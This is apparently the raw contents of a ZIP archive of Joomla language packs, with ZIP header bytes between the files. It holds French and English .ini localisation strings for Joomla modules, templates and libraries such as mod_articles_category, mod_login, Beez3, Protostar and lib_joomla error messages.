MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_LABEL="Filtre sur les Alias"
MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_DESC="Le mode 'Inclure' inclut uniquement les auteurs sélectionnés<br />Le mode 'Exclure' exclut toutes les auteurs sélectionnés."
MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_LABEL="Filtre d'auteurs"
MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_DESC="Nombre de niveaux de catégories enfants à afficher."
MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_LABEL="Niveaux de catégorie"
MOD_ARTICLES_CATEGORY_FIELD_CATEGORY_DESC="Veuillez sélectionner une ou plusieurs catégories."
MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_DESC="Le mode 'Inclure' inclut uniquement les catégories sélectionnées<br />Le mode 'Exclure' exclut toutes les catégories sélectionnées."
MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_LABEL="Filtre de catégorie"
MOD_ARTICLES_CATEGORY_FIELD_COUNT_DESC="Nombre d'articles à afficher.<br />La valeur '0' affiche tous les articles."
MOD_ARTICLES_CATEGORY_FIELD_COUNT_LABEL="Nombre"
MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_DESC="Sélectionnez le champ date auquel appliquer la plage de dates."
MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_LABEL="Plage de dates"
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_DESC="Sélectionnez le type de champ de date à utiliser."
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_LABEL="Date utilisée"
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_DESC="Veuillez saisir un format de date valide.<br />Voir : https://php.net/date "
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_LABEL="Format de la date"
MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_DESC="Le mode 'Plage' définit les articles à afficher selon une date de départ et de fin.<br />Le mode 'Relative' définit les articles à afficher selon une date relative basée sur les X derniers jours spécifiés."
MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_LABEL="Filtre de date"
MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_DESC="Sélectionnez le champ de date auquel vous souhaitez appliquer le regroupement de dates."
MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_LABEL="Champ de regroupement de dates"
MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_DESC="Merci de saisir une date de fin."
MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_LABEL="Fin de la plage"
MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_DESC="Veuillez saisir chaque ID d'article à exclure sur une nouvelle ligne."
MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_LABEL="ID des articles à exclure"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_DISPLAY_LABEL="Options d'affichage"
; The following string is deprecated and will be removed with 4.0
MOD_ARTICLES_CATEGORY_FIELD_GROUP_DYNAMIC_LABEL="Mode dynamique"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_FILTERING_LABEL="Options de filtrage"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_GROUPING_LABEL="Options de regroupement"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_ORDERING_LABEL="Ordre d'affichage"
MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_DESC="Veuillez saisir une valeur numérique pour le nombre de caractères maximum à afficher en tant qu'introduction."
MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_LABEL="Caractères maximum"
MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_LABEL="Liens sur titres"
MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_DESC="Liens sur les titres des articles"
MOD_ARTICLES_CATEGORY_FIELD_MODE_DESC="Veuillez sélectionner le mode souhaité.<br />Le mode 'Normal' affiche une liste statique d'articles selon les paramètres du module.<br />Le mode 'Dynamique' affiche une liste d'articles selon les paramètres du module mais également selon la page sur laquelle il est affiché (les paramètres sur les catégories ne sont pas pris en compte) ; le module détecte si vous êtes sur un affichage de type 'Catégorie' et adapte la liste avec des articles de cette catégorie."
MOD_ARTICLES_CATEGORY_FIELD_MODE_LABEL="Mode"
MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_DESC="Veuillez saisir un format de date valide.<br />Voir : https://php.net/date "
MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_LABEL="Format d'affichage du mois et de l'année"
MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_DESC="Merci de saisir une valeur numérique correspondant au nombre de jours à tenir compte à partir de la date du jour consulté."
MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_LABEL="Date relative"
MOD_ARTICLES_CATEGORY_FIELD_SHOWAUTHOR_DESC="Afficher/Masquer le nom des auteurs (ou l'alias si disponible) des articles."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCATEGORY_DESC="Afficher/Masquer la catégorie des articles."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_DESC="Inclure ou exclure les articles des catégories enfants."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_LABEL="Catégories enfants"
MOD_ARTICLES_CATEGORY_FIELD_SHOWDATE_DESC="Afficher/Masquer la date des articles selon le paramètre spécifié ci-dessous."
MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_DESC="Afficher, masquer, ou afficher uniquement les articles 'en vedette'."
MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_LABEL="Articles 'en vedette'"
MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_DESC="Afficher/Masquer le nombre d'affichages (clics) des article."
MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_LABEL="Clics"
MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_DESC="Afficher/Masquer un texte d'introduction des articles."
MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_LABEL="Introduction"
MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_DESC="Afficher/Masquer la liste d'articles sur les pages des articles. Cela sous-entend que le module est en mode 'Dynamique' sur les pages de catégories."
MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_LABEL="En page d'articles"
MOD_ARTICLES_CATEGORY_FIELD_SHOWTAGS_DESC="Afficher les tags pour chaque article."
MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_DESC="Merci de saisir une date de début."
MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_LABEL="Début de la plage"
MOD_ARTICLES_CATEGORY_OPTION_ASCENDING_VALUE="Ascendant"
MOD_ARTICLES_CATEGORY_OPTION_CREATED_VALUE="Date de création"
MOD_ARTICLES_CATEGORY_OPTION_DATERANGE_VALUE="Plage"
MOD_ARTICLES_CATEGORY_OPTION_DESCENDING_VALUE="Descendant"
MOD_ARTICLES_CATEGORY_OPTION_DYNAMIC_VALUE="Dynamique"
MOD_ARTICLES_CATEGORY_OPTION_EXCLUDE_VALUE="Exclure"
MOD_ARTICLES_CATEGORY_OPTION_EXCLUSIVE_VALUE="Exclure"
MOD_ARTICLES_CATEGORY_OPTION_HITS_VALUE="Clics"
MOD_ARTICLES_CATEGORY_OPTION_ID_VALUE="Id"
MOD_ARTICLES_CATEGORY_OPTION_INCLUDE_VALUE="Inclure"
MOD_ARTICLES_CATEGORY_OPTION_INCLUSIVE_VALUE="Inclure"
MOD_ARTICLES_CATEGORY_OPTION_MODIFIED_VALUE="Date de modification"
MOD_ARTICLES_CATEGORY_OPTION_MONTHYEAR_VALUE="Mois et année"
MOD_ARTICLES_CATEGORY_OPTION_NORMAL_VALUE="Normal"
MOD_ARTICLES_CATEGORY_OPTION_OFF_VALUE="Désactivé"
MOD_ARTICLES_CATEGORY_OPTION_ONLYFEATURED_VALUE="Uniquement"
MOD_ARTICLES_CATEGORY_OPTION_ORDERING_VALUE="Ordre des articles"
MOD_ARTICLES_CATEGORY_OPTION_ORDERINGFEATURED_VALUE="Ordre du gestionnaire d'articles en vedette"
MOD_ARTICLES_CATEGORY_OPTION_RANDOM_VALUE="Aléatoire"
MOD_ARTICLES_CATEGORY_OPTION_RATING_VALUE="Évaluation"
MOD_ARTICLES_CATEGORY_OPTION_RELATIVEDAY_VALUE="Relative"
MOD_ARTICLES_CATEGORY_OPTION_STARTPUBLISHING_VALUE="Date de début de publication"
MOD_ARTICLES_CATEGORY_OPTION_FINISHPUBLISHING_VALUE="Date de fin de publication"
MOD_ARTICLES_CATEGORY_OPTION_VOTE_VALUE="Vote"
MOD_ARTICLES_CATEGORY_OPTION_YEAR_VALUE="Année"
MOD_ARTICLES_CATEGORY_READ_MORE="Lire la suite : "
MOD_ARTICLES_CATEGORY_READ_MORE_TITLE="Lire la suite..."
MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE="S'inscrire pour lire la suite"
MOD_ARTICLES_CATEGORY_UNTAGGED="Non tagué"
MOD_ARTICLES_CATEGORY_XML_DESCRIPTION="Le module 'mod_articles_category' affiche une liste d'article d'une ou de plusieurs catégories selon les paramètres choisis."
PK!3�N�fr-FR/fr-FR.tpl_beez3.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


TPL_BEEZ3_ADDITIONAL_INFORMATION="Informations supplémentaires"
TPL_BEEZ3_ALTCLOSE="est fermé"
TPL_BEEZ3_ALTOPEN="est ouvert"
TPL_BEEZ3_BIGGER="Augmenter"
TPL_BEEZ3_CLICK="clic"
TPL_BEEZ3_CLOSEMENU="Masquer le menu"
TPL_BEEZ3_DECREASE_SIZE="Réduire la taille"
TPL_BEEZ3_ERROR_JUMP_TO_NAV="Aller à la navigation"
TPL_BEEZ3_FIELD_BOOTSTRAP_DESC="Vous pouvez créer une liste séparée par des virgules des composants pour lesquels Bootstrap est nécessaire, par exemple com_name, com_anothername."
TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL="Composants requérant<br/> Bootstrap"
TPL_BEEZ3_FIELD_DESCRIPTION_DESC="Veuillez ajouter la description de votre site ici"
TPL_BEEZ3_FIELD_DESCRIPTION_LABEL="Description du Site"
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC="Couleur de fond utilisée si le paramètre 'Couleur personnalisée' est sélectionné."
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL="Couleur de fond"
TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC="Utiliser l'image d'en-tête sélectionnée lorsque l'option 'Couleur personnalisée' est sélectionné"
TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL="Image d'en-tête"
TPL_BEEZ3_FIELD_LOGO_DESC="Veuillez sélectionner une image. Si vous ne souhaitez pas afficher de logo, cliquez sur 'Effacer' et laissez le champ vide."
TPL_BEEZ3_FIELD_LOGO_LABEL="Logo"
TPL_BEEZ3_FIELD_NAVPOSITION_DESC="Afficher la navigation avant ou après le contenu."
TPL_BEEZ3_FIELD_NAVPOSITION_LABEL="Position de navigation"
TPL_BEEZ3_FIELD_SITETITLE_DESC="Veuillez spécifier un titre pour le site si vous n'utilisez pas de logo."
TPL_BEEZ3_FIELD_SITETITLE_LABEL="Titre du site"
TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC="Choisissez un style pour le template.<br />Pour créer des variantes de style, consultez l'aide en ligne."
TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL="Style du template"
TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC="Largeur de la colonne principale avec les colonnes additionnelles fermées (en % de la fenêtre)."
TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL="Largeur de la colonne principale seule (%)"
TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC="Largeur de la colonne principale avec les colonnes additionnelles ouvertes (en % de la fenêtre)."
TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL="Largeur de la colonne principale + modules (%)"
TPL_BEEZ3_FONTSIZE="Taille de la police"
TPL_BEEZ3_INCREASE_SIZE="Augmenter la taille"
TPL_BEEZ3_JUMP_TO_INFO="Aller aux informations additionnelles"
TPL_BEEZ3_JUMP_TO_NAV="Aller au menu principal et à l'identification"
TPL_BEEZ3_NAVIGATION="Navigation"
TPL_BEEZ3_NAV_VIEW_SEARCH="Navigation de recherche"
TPL_BEEZ3_NEXTTAB="Onglet suivant"
TPL_BEEZ3_OPENMENU="Afficher le menu"
TPL_BEEZ3_OPTION_AFTER_CONTENT="Après le contenu"
TPL_BEEZ3_OPTION_BEFORE_CONTENT="Avant le contenu"
TPL_BEEZ3_OPTION_IMAGE="Couleur personnalisée"
TPL_BEEZ3_OPTION_NATURE="Nature"
TPL_BEEZ3_OPTION_PERSONAL="Personnel"
TPL_BEEZ3_OPTION_RED="Rouge"
TPL_BEEZ3_OPTION_TURQ="Turquoise"
TPL_BEEZ3_POWERED_BY="Animé par"
TPL_BEEZ3_RESET="Réinitialiser"
TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT="Revenir aux styles par défaut"
TPL_BEEZ3_SEARCH="Recherche"
TPL_BEEZ3_SKIP_TO_CONTENT="Aller au contenu"
TPL_BEEZ3_SKIP_TO_ERROR_CONTENT="Aller au message d'erreur"
TPL_BEEZ3_SMALLER="Diminuer"
TPL_BEEZ3_SYSTEM_MESSAGE="Informations"
TPL_BEEZ3_TEXTRIGHTCLOSE="Fermer les infos"
TPL_BEEZ3_TEXTRIGHTOPEN="Ouvrir les infos"
TPL_BEEZ3_XML_DESCRIPTION="Beez3, le template au normes d'accessibilité pour Joomla! 3.x  - Version HTML 5"
TPL_BEEZ3_YOUR_SITE_DESCRIPTION="La description de votre site"
PK!h>���fr-FR/fr-FR.mod_login.ininu&1i�; @date        2015-10-15
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_LOGIN="Connexion"
MOD_LOGIN_FIELD_GREETING_DESC="Afficher/Masquer après connexion le message d'accueil (Bonjour...).<br />Selon la position du module, le message sera affiché au-dessus ou à gauche du bouton de déconnexion."
MOD_LOGIN_FIELD_GREETING_LABEL="Message d'accueil"
MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_DESC="Sélectionnez ou créez le lien de menu correspondant à la page vers laquelle vous souhaitez rediriger l'utilisateur après sa connexion sur le site. La valeur par défaut redirigera vers la même page."
MOD_LOGIN_FIELD_LOGIN_REDIRECTURL_LABEL="Redirection après connexion"
MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_DESC="Sélectionnez ou créez le lien de menu correspondant à la page vers laquelle vous souhaitez rediriger l'utilisateur après sa déconnexion du site. La valeur par défaut redirigera vers la même page."
MOD_LOGIN_FIELD_LOGOUT_REDIRECTURL_LABEL="Redirection après déconnexion"
MOD_LOGIN_FIELD_NAME_DESC="Utiliser le nom ou l'identifiant dans le message d'accueil affiché après connexion (Bonjour...)."
MOD_LOGIN_FIELD_NAME_LABEL="Contenu du message"
MOD_LOGIN_FIELD_POST_TEXT_DESC="Vous pouvez spécifier un texte en utilisant du code HTML à afficher au-dessous des champs de connexion et des liens (si affichés)."
MOD_LOGIN_FIELD_POST_TEXT_LABEL="Texte affiché après"
MOD_LOGIN_FIELD_PRE_TEXT_DESC="Vous pouvez spécifier un texte en utilisant du code HTML à afficher au-dessus des champs de connexion."
MOD_LOGIN_FIELD_PRE_TEXT_LABEL="Texte affiché avant"
MOD_LOGIN_FIELD_PROFILE_LABEL="Afficher le lien du profil"
MOD_LOGIN_FIELD_PROFILE_DESC="Afficher un lien vers la page du profil utilisateur après connexion."
MOD_LOGIN_FIELD_USESECURE_DESC="Soumettre les données de connexion de façon cryptée en utilisant HTTPS (connexions encryptées avec le préfixe de protocole https://). Note : HTTPS doit être activé sur votre serveur pour utiliser cette option."
MOD_LOGIN_FIELD_USESECURE_LABEL="Connexion cryptée"
MOD_LOGIN_FIELD_USETEXT_DESC="Utiliser du texte ou des icônes pour la description des champs (Icônes par défaut)."
MOD_LOGIN_FIELD_USETEXT_LABEL="Afficher les descriptions"
MOD_LOGIN_FORGOT_YOUR_PASSWORD="Mot de passe oublié ?"
MOD_LOGIN_FORGOT_YOUR_USERNAME="Identifiant oublié ?"
MOD_LOGIN_HINAME="Bonjour, %s"
MOD_LOGIN_PROFILE="Afficher le profil"
MOD_LOGIN_REGISTER="Créer un compte"
MOD_LOGIN_REMEMBER_ME="Se souvenir de moi"
MOD_LOGIN_VALUE_ICONS="Icônes"
MOD_LOGIN_VALUE_NAME="Nom"
MOD_LOGIN_VALUE_TEXT="Texte"
MOD_LOGIN_VALUE_USERNAME="Identifiant"
MOD_LOGIN_XML_DESCRIPTION="Le module 'mod_login' affiche un formulaire d'identification pour se connecter sur le site et, selon les paramètres choisis, un lien pour récupérer l'identifiant si oublié, régénérer un nouveau mot de passe et, créer un compte si l'inscription des utilisateurs est autorisée (voir Utilisateurs->Paramètres)."
PK!��>IIfr-FR/fr-FR.mod_banners.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_BANNERS="Bannières"
MOD_BANNERS_XML_DESCRIPTION="Le module 'mod_banners' affiche les bannières liées aux 'clients' définis dans le composant de gestion des bannières."
MOD_BANNERS_LAYOUT_DEFAULT="Défaut"

PK!�&Z���fr-FR/fr-FR.tpl_protostar.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


TPL_PROTOSTAR_XML_DESCRIPTION="Poursuivant le thème sur l'espace (Solarflare de Joomla 1.0 et Milkyway de Joomla 1.5 ), Protostar est le template de site Joomla 3, basé sur Bootstrap et le lancement de l'interface utilisateur Joomla bibliothèque (JUI)."

TPL_PROTOSTAR_BACKGROUND_COLOR_DESC="Choisissez une couleur de fond pour les éléments statiques (par défaut : #F4F6F7)."
TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL="Couleur de fond"
TPL_PROTOSTAR_BACKTOTOP="Haut de page"
TPL_PROTOSTAR_COLOR_DESC="Choisissez une couleur globale pour le template (par défaut : #0088C)."
TPL_PROTOSTAR_COLOR_LABEL="Couleur du template"
TPL_PROTOSTAR_FLUID="Fluide"
TPL_PROTOSTAR_FLUID_LABEL="Affichage fluide (adaptable selon la largeur)."
TPL_PROTOSTAR_FLUID_DESC="Utiliser un affichage fluide ou fixe pour les containers Bootstrap (les deux sont Responsive)."
TPL_PROTOSTAR_FONT_LABEL="Polices Google des titres"
TPL_PROTOSTAR_FONT_DESC="Utiliser une police Google pour les titres (H1, H2, H3, etc.)."
TPL_PROTOSTAR_FONT_NAME_LABEL="Nom de police Google"
TPL_PROTOSTAR_FONT_NAME_DESC="Exemple : Open+Sans ou Source+Sans+Pro"
TPL_PROTOSTAR_LOGO_LABEL="Logo"
TPL_PROTOSTAR_LOGO_DESC="Choisir un logo personnalisé pour le template."
TPL_PROTOSTAR_STATIC="Statique"
TPL_PROTOSTAR_TOGGLE_MENU="Basculer la navigation"

PK!Q
���fr-FR/fr-FR.lib_phputf8.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_PHPUTF8="phputf8"
LIB_PHPUTF8_XML_DESCRIPTION="Classes pour l'UTF-8"

PK!�
�Iff!fr-FR/fr-FR.mod_languages.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_LANGUAGES="Changement de langue"
MOD_LANGUAGES_XML_DESCRIPTION="Le module 'mod_language' permet de choisir une langue (telles que définies dans Le Gestionnaire de langues, onglet 'Contenu') pour n'afficher que les contenus qui lui sont attribués.<br />Lorsque le plug-in 'Filtre de langue' est activé, que l'utilisateur change de langue et que l'élément n'a pas d'association, l'utilisateur est redirigé sur la page d'accueil définie pour la langue sélectionnée.<br />Si le paramètre d'association est activé dans le plug-in 'Filtre de langue' et que l'élément affiché est associé, l'utilisateur sera redirigé vers l'élément associé pour la langue choisie.<br /> Si le plug-in n'est pas activé, les résultats seront imprévisibles.<br /><br /><strong>Procédure :</strong><br />1. Ouvrez le Gestionnaire de langue, onglet 'Contenu', assurez-vous que les langues désirées soient publiées et que leurs tags de langue, préfixes d'image et codes de langue soient corrects.<br />2. Créez pour chaque langue de contenu un menu spécifique.<br />3. Créez dans chacun de ces menus un lien de menu auquel est assigné la langue désirée, affichant un contenu auquel la même langue sera assignée. Définissez ce lien de menu comme page d'accueil par défaut.<br />4. Créez tous les articles et modules souhaités en leur assignant la langue désirée.<br /> 5. Quand des liens de menu sont associés, assurez-vous que le module est affiché sur les pages concernées.<br />6. L'ordre d'affichage des drapeaux ou les noms de langue dans le module sont définis par l'ordre défini dans le 'Gestionnaire de langues', onglet 'Contenu'.<br /> 6. N'oubliez pas de publier ce module et d'activer le 'Filtre de langue' !"
MOD_LANGUAGES_LAYOUT_DEFAULT="Défaut"

PK!�V�
index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!�Ϋg��$en-GB/en-GB.mod_articles_archive.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_ARCHIVE="Articles - Archived"
MOD_ARTICLES_ARCHIVE_FIELD_COUNT_LABEL="# of Months"
MOD_ARTICLES_ARCHIVE_FIELD_COUNT_DESC="The number of months to display (the default is 10)."
MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION="This module shows a list of the calendar months with archived articles. After you have changed the status of an article to archived, this list will be automatically generated."
MOD_ARTICLES_ARCHIVE_DATE="%1$s, %2$s"

PK!0r%��en-GB/en-GB.tpl_protostar.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_BACKGROUND_COLOR_DESC="Choose a background colour for static layouts. If left blank the Default (#f4f6f7) is used."
TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_PROTOSTAR_BACKTOTOP="Back to Top"
TPL_PROTOSTAR_COLOR_DESC="Choose an overall colour for the site template. If left blank the Default (#0088cc) is used."
TPL_PROTOSTAR_COLOR_LABEL="Template Colour"
TPL_PROTOSTAR_FLUID_DESC="Use Bootstrap's Fluid or Static Container (both are Responsive)."
TPL_PROTOSTAR_FLUID_LABEL="Fluid Layout"
TPL_PROTOSTAR_FLUID="Fluid"
TPL_PROTOSTAR_FONT_DESC="Load a Google font for the headings (H1, H2, H3, etc)."
TPL_PROTOSTAR_FONT_LABEL="Google Font for Headings"
TPL_PROTOSTAR_FONT_NAME_DESC="Example: Open+Sans or Source+Sans+Pro."
TPL_PROTOSTAR_FONT_NAME_LABEL="Google Font Name"
TPL_PROTOSTAR_LOGO_DESC="Select or upload a custom logo for the site template."
TPL_PROTOSTAR_LOGO_LABEL="Logo"
TPL_PROTOSTAR_STATIC="Static"
TPL_PROTOSTAR_TOGGLE_MENU="Toggle Navigation"
TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."
PK!O�ӇNNen-GB/en-GB.com_wrapper.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_WRAPPER_NO_IFRAMES="This option will not work correctly. Unfortunately, your browser does not support inline frames."

PK!�El�����en-GB/en-GB.lib_joomla.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.

; Keep this string on top
JERROR_PARSING_LANGUAGE_FILE="&#160;: error(s) in line(s) %s"

JLIB_APPLICATION_ERROR_ACCESS_FORBIDDEN="Access forbidden."
JLIB_APPLICATION_ERROR_APPLICATION_GET_NAME="JApplication: :getName() : Can't get or parse class name."
JLIB_APPLICATION_ERROR_APPLICATION_LOAD="Unable to load application: %s"
JLIB_APPLICATION_ERROR_BATCH_CANNOT_CREATE="You are not allowed to create new items in this category."
JLIB_APPLICATION_ERROR_BATCH_CANNOT_EDIT="You are not allowed to edit one or more of these items."
JLIB_APPLICATION_ERROR_BATCH_FAILED="Batch process failed with following error: %s"
JLIB_APPLICATION_ERROR_BATCH_MOVE_CATEGORY_NOT_FOUND="Can't find the destination category for this move."
JLIB_APPLICATION_ERROR_BATCH_MOVE_ROW_NOT_FOUND="Can't find the item being moved."
JLIB_APPLICATION_ERROR_CHECKIN_FAILED="Check-in failed with the following error: %s"
JLIB_APPLICATION_ERROR_CHECKIN_NOT_CHECKED="Item is not checked out."
JLIB_APPLICATION_ERROR_CHECKIN_USER_MISMATCH="The user checking in does not match the user who checked out the item."
JLIB_APPLICATION_ERROR_CHECKOUT_FAILED="Check-out failed with the following error: %s"
JLIB_APPLICATION_ERROR_CHECKOUT_USER_MISMATCH="The user checking out does not match the user who checked out the item."
JLIB_APPLICATION_ERROR_COMPONENT_NOT_FOUND="Component not found."
JLIB_APPLICATION_ERROR_COMPONENT_NOT_LOADING="Error loading component: %1$s, %2$s"
JLIB_APPLICATION_ERROR_CONTROLLER_GET_NAME="JController: :getName() : Can't get or parse class name."
JLIB_APPLICATION_ERROR_CREATE_RECORD_NOT_PERMITTED="Create record not permitted."
JLIB_APPLICATION_ERROR_DELETE_NOT_PERMITTED="Delete not permitted."
JLIB_APPLICATION_ERROR_EDITSTATE_NOT_PERMITTED="Edit state is not permitted."
JLIB_APPLICATION_ERROR_EDIT_ITEM_NOT_PERMITTED="Edit is not permitted."
JLIB_APPLICATION_ERROR_EDIT_NOT_PERMITTED="Edit not permitted."
JLIB_APPLICATION_ERROR_HISTORY_ID_MISMATCH="Error restoring item version from history."
JLIB_APPLICATION_ERROR_INSUFFICIENT_BATCH_INFORMATION="Insufficient information to perform the batch operation."
JLIB_APPLICATION_ERROR_INVALID_CONTROLLER_CLASS="Invalid controller class: %s"
JLIB_APPLICATION_ERROR_INVALID_CONTROLLER="Invalid controller: name='%s', format='%s'"
JLIB_APPLICATION_ERROR_LAYOUTFILE_NOT_FOUND="Layout %s not found."
JLIB_APPLICATION_ERROR_LIBRARY_NOT_FOUND="Library not found."
JLIB_APPLICATION_ERROR_LIBRARY_NOT_LOADING="Error loading library: %1$s, %2$s"
JLIB_APPLICATION_ERROR_MENU_LOAD="Error loading menu: %s"
JLIB_APPLICATION_ERROR_MODEL_GET_NAME="JModel: :getName() : Can't get or parse class name."
JLIB_APPLICATION_ERROR_MODULE_LOAD="Error loading module %s"
JLIB_APPLICATION_ERROR_PATHWAY_LOAD="Unable to load pathway: %s"
JLIB_APPLICATION_ERROR_REORDER_FAILED="Reorder failed. Error: %s"
JLIB_APPLICATION_ERROR_ROUTER_LOAD="Unable to load router: %s"
JLIB_APPLICATION_ERROR_MODELCLASS_NOT_FOUND="Model class %s not found in file."
JLIB_APPLICATION_ERROR_SAVE_FAILED="Save failed with the following error: %s"
JLIB_APPLICATION_ERROR_SAVE_NOT_PERMITTED="Save not permitted."
JLIB_APPLICATION_ERROR_TABLE_NAME_NOT_SUPPORTED="Table %s not supported. File not found."
JLIB_APPLICATION_ERROR_TASK_NOT_FOUND="Task [%s] not found."
JLIB_APPLICATION_ERROR_UNHELD_ID="You are not permitted to use that link to directly access that page (#%d)."
JLIB_APPLICATION_ERROR_VIEW_CLASS_NOT_FOUND="View class not found [class, file]: %1$s, %2$s"
JLIB_APPLICATION_ERROR_VIEW_GET_NAME_SUBSTRING="JView: :getName() : Your classname has the substring 'view'. This causes problems when extracting the classname from the name of your objects view. Avoid Object names with the substring 'view'."
JLIB_APPLICATION_ERROR_VIEW_GET_NAME="JView: :getName() : Can't get or parse class name."
JLIB_APPLICATION_ERROR_VIEW_NOT_FOUND="View not found [name, type, prefix]: %1$s, %2$s, %3$s"
JLIB_APPLICATION_SAVE_SUCCESS="Item saved."
JLIB_APPLICATION_SUBMIT_SAVE_SUCCESS="Item submitted."
